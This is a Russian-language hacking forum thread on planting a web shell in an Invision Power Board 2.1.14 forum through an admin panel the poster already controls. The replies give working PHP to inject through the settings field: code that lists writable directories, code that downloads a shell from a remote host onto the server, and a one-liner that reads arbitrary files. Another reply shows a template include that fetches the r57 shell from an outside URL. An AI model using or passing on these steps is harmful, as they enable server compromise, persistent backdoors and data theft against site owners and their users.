Везде искал так и ненашел способа.
Имею полный доступ к админке ipb 2.1.14.
Через смайлики не заливается что делать ?

http://www.someshit.net/showthread.php?p=357#post357

попробуй через инклудинг, помоему это сработает

лей через настройки.

Заходиш в настройки -> выбираеш любую настройку -> добавить настройку.
В поле php код вбиваеш:
$d = dir(".");
echo "Path: " . realpath($d->path) . "<br />\n";
while (false !== ($entry = $d->read())) {
if (is_dir(realpath($d->path).'/'.$entry)) {
echo "[".$entry."]".(is_writable(realpath($d->path).'/'.$entry)
? '[w]' : '').
"<br />\n";
} else {
echo $entry.(is_writable(realpath($d->path).'/'.$entry) ?
'[w]' : '')."<br />\n";
}
}
$d->close();

Потом ищиш диру где разрешена запись и таким же способом загружаеш шелл, вот код для удалённой загрузки:
$linky="http://site.ru/shell.php";
$saved="/путь_до_расширенной_диры/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);

У меня такое всегда работает даже когда SafeMode On
Если хочеш прочитать какой либо файл ,то вбиваеш в поле php код следующее:

echo nl2br(htmlspecialchars(implode('', file('/путь_до_файла/file.php'))));

Для особенно "пряморуких" людей, у которых не получается ни один из вышеперечисленных способов, а шелл заинклудить очень хочется )) Есть вариант работающий со всеми версиями IPB.
В основном шаблоне форума (Board Header and Footer Wrapper) можно вот так заинклудить
<!--exec.url="http://underwater.xtoolz.ru/shell/r57.txt"-->
Так же и локальные файлы инклудить можно только с помощью exec.file.

Cпасибо ребят! :) Я как 2 дня разобрался с этим :) Вся инфа тут http://www.someshit.net/showthread.php?p=357#post357!